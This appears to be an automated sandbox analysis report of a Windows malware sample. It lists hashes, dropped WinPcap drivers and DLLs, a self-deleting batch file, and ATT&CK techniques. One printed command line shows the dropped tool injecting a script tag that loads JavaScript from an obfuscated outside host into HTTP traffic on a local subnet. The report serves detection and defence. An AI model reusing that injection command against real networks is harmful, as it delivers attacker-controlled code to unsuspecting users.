410aae7b289f477ef338588a1cf9f234a6a58cdfe59bb75bc6417d21e305f056

General

Target

6216999ae03e9bc94f4f910918a3d550.exe
Size

177KB
MD5

6216999ae03e9bc94f4f910918a3d550
SHA1

ac9e37b3422fa4c6c34725e8314e04c91a185f81
SHA256

410aae7b289f477ef338588a1cf9f234a6a58cdfe59bb75bc6417d21e305f056
SHA512

87dcf16c6cef0cd60a5a8655694c472fa3b55533de167ccd29f5840c6138c9b840b03669f043a14bcf4d68ef182a7287ce3004bcdeba252853817aa427da0c69
SSDEEP

3072:Q1r61/kTgwCiCAeHwSocr8FrAlFs13G5hDO9HTyIFZWRk1nC0Hunbrd/AoutD:ur3bCiReQS/QrAlFsaDOFT5ZWRkBun/C

Score

8^/10

Malware Config

Signatures

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\drivers\npf.sys	6216999ae03e9bc94f4f910918a3d550.exe

Deletes itself 1 IoCs

pid	Process
2616	cmd.exe

Executes dropped EXE 1 IoCs

pid	Process
2880	360uatn.exe

Loads dropped DLL 5 IoCs

pid	Process
2896	6216999ae03e9bc94f4f910918a3d550.exe
2896	6216999ae03e9bc94f4f910918a3d550.exe
2880	360uatn.exe
2880	360uatn.exe
2880	360uatn.exe

Drops file in System32 directory 4 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\Packet.dll	6216999ae03e9bc94f4f910918a3d550.exe
File created	C:\Windows\SysWOW64\WanPacket.dll	6216999ae03e9bc94f4f910918a3d550.exe
File created	C:\Windows\SysWOW64\wpcap.dll	6216999ae03e9bc94f4f910918a3d550.exe
File created	C:\Windows\SysWOW64\360uatn.exe	6216999ae03e9bc94f4f910918a3d550.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2676	PING.EXE

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 2896 wrote to memory of 2880	2896	6216999ae03e9bc94f4f910918a3d550.exe	28
PID 2896 wrote to memory of 2880	2896	6216999ae03e9bc94f4f910918a3d550.exe	28
PID 2896 wrote to memory of 2880	2896	6216999ae03e9bc94f4f910918a3d550.exe	28
PID 2896 wrote to memory of 2880	2896	6216999ae03e9bc94f4f910918a3d550.exe	28
PID 2896 wrote to memory of 2616	2896	6216999ae03e9bc94f4f910918a3d550.exe	32
PID 2896 wrote to memory of 2616	2896	6216999ae03e9bc94f4f910918a3d550.exe	32
PID 2896 wrote to memory of 2616	2896	6216999ae03e9bc94f4f910918a3d550.exe	32
PID 2896 wrote to memory of 2616	2896	6216999ae03e9bc94f4f910918a3d550.exe	32
PID 2616 wrote to memory of 2676	2616	cmd.exe	30
PID 2616 wrote to memory of 2676	2616	cmd.exe	30
PID 2616 wrote to memory of 2676	2616	cmd.exe	30
PID 2616 wrote to memory of 2676	2616	cmd.exe	30

C:\Users\Admin\AppData\Local\Temp\6216999ae03e9bc94f4f910918a3d550.exe
"C:\Users\Admin\AppData\Local\Temp\6216999ae03e9bc94f4f910918a3d550.exe"
1⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:2896
- C:\Windows\SysWOW64\360uatn.exe
  -idx 0 -ip 10.127.0.2-10.127.0.254 -port 80 -insert "<script language=JavaScript src=http://e%61b.P%61ss%69ngG%61s.n%65t/tj.js></script>"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:2880
- C:\Windows\SysWOW64\cmd.exe
  cmd /c 12.bat
  2⤵
  - Deletes itself
  - Suspicious use of WriteProcessMemory
  PID:2616

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 5
1⤵
- Runs ping.exe
PID:2676

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Remote System Discovery

1

T1018

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\12.bat

Filesize
2KB

MD5
0380925d6e60fdb4355199bddbaa8a24

SHA1
efd8404d61c711fbe2b881a17d84474bcd5a4466

SHA256
fe8b7f31a69de7de2bcfe3bff611ae4b44eee68ff3c550d1cbf814dedc4b1a8c

SHA512
d51d09b4b738b42a39c717f480f5ded81dde53370dca5456f122daa0af30cbc1e0247e77b14794b6abc82b76b05cd47048090c55466606b9f90cc5308cea313c

Download Submit
C:\Windows\SysWOW64\360uatn.exe

Filesize
1.1MB

MD5
65ea43174cf6276481fa46a158bd249a

SHA1
defdd23f948f39fcba7665da5c4155131bd8108a

SHA256
88a161d31ddf4598691ed45e3134e427e37022a93c6a67196839a49c5c14471b

SHA512
25738f538876de1c118503f0c23e32bcff8c13e386900395047b5d55ec276fe9b5a7ea1eb4bd2380e62eb40d31100fa62d46306b2213792e3674bf4a69b97c89

Download Submit
C:\Windows\SysWOW64\360uatn.exe

Filesize
382KB

MD5
8ae08e8f731289917262ef0dda7053e4

SHA1
fc60770ebe5d628a100a0fc9d6bd4bcfabf608a9

SHA256
6f91c199d257a0cdc08586c592ae87db41a4965d28228daaf62dcc91680913c7

SHA512
e310a1e6abbfc39ff580c06401973bcd9d7d376a2d3026cf6ddcceac05190fcd55b2a1962692e809e424dc49c91e5c579765be8b17fd187a527fa6cfa30d7002

Download Submit
C:\Windows\SysWOW64\WPCAP.DLL

Filesize
234KB

MD5
ce842d25e5b7e6ff21a86cad9195fbe8

SHA1
d762270be089a89266b012351b52c595e260b59b

SHA256
7e8c0119f352424c61d6fad519394924b7aedbf8bfb3557d53c2961747d4c7f3

SHA512
84c23addda6ff006d4a3967b472af10a049b2a045d27d988d22153fc3ba517e21520a31eb061a2ef2abf302e365564dd4601d240ec3d5894fb96f10a9fae97d6

Download Submit
\Windows\SysWOW64\360uatn.exe

Filesize
1024KB

MD5
cdffbbeba8eb8b98b5def9768f80a574

SHA1
b44029edfa455034be5bff02843965c42859e4bf

SHA256
61a286c6bf212739cee7c29d23cc52dc6cc4c8613d0f5df5e78aa346452f6dc0

SHA512
983ec8cd4882d792092f1f1d965fe722454b526c9d50dba4e240ffe6e72ed0e6621a538400fb133cbadcfe31af13c1d864b93c5eef0237ec417d86a146c19c00

Download Submit
\Windows\SysWOW64\360uatn.exe

Filesize
1.1MB

MD5
4663eef94d3e08a3a1a7a95a306c1680

SHA1
fb63cd0345bcaa554918fe4bc2661d8ebd84f622

SHA256
a41519af4299ed5b7b31569b9c14de6a24b2995a0e08efa5ad7e3e290facfc92

SHA512
1f4bb496ec492b535e49f56c94d82d0a17588bd6b24e18285b8ae27fc9f4ee7c04b06c43f3f078b204eeee243ca11bedec9f77c8007ca830e548a9cee4d420b1

Download Submit
\Windows\SysWOW64\Packet.dll

Filesize
86KB

MD5
9062aeea8cbfc4f0780bbbefad7cebcb

SHA1
c4ad39ec51ad0e84fe58f62931d13cddfde3189e

SHA256
b2535129b26366484c487cc2ce536d8fcfa9d1ac1dab0db9560b4532012c352c

SHA512
60957548fc2272998aea518acf3b1812ed77f73e960a99ddf0d6b474b0858225286c26554bf81c00acf3cb1c77c5ce458d80e149ed4766287d7e32af9681e646

Download Submit
\Windows\SysWOW64\wpcap.dll

Filesize
96KB

MD5
5bb05e25abffb010956ba5c056e1944e

SHA1
d60f85c934483d1879e63bfd869f27492d7a5344

SHA256
811df1a04bf391864f0de6e55e2045ca5f3b69bce80255f233f929ea40ca420b

SHA512
8110dafc05cd2580bf54f92a34d73b18368b728ed72ee8cd289eac8dcbd521eb481774f8d759155eca1ff93ac376f34ca52a161196916635dd85c62e999be002

Download Submit
memory/2880-24-0x0000000000030000-0x0000000000040000-memory.dmp

Filesize
64KB

Download
memory/2880-21-0x0000000000220000-0x0000000000235000-memory.dmp

Filesize
84KB

Download
memory/2880-25-0x0000000000400000-0x000000000040F000-memory.dmp

Filesize
60KB

Download
memory/2896-0-0x0000000000400000-0x0000000000485000-memory.dmp

Filesize
532KB

Download
memory/2896-15-0x00000000003B0000-0x00000000003BF000-memory.dmp

Filesize
60KB

Download
memory/2896-9-0x00000000003B0000-0x00000000003BF000-memory.dmp

Filesize
60KB

Download
memory/2896-3-0x0000000000400000-0x0000000000485000-memory.dmp

Filesize
532KB

Download
memory/2896-1-0x0000000000400000-0x0000000000485000-memory.dmp

Filesize
532KB

Download

Analysis

Sharing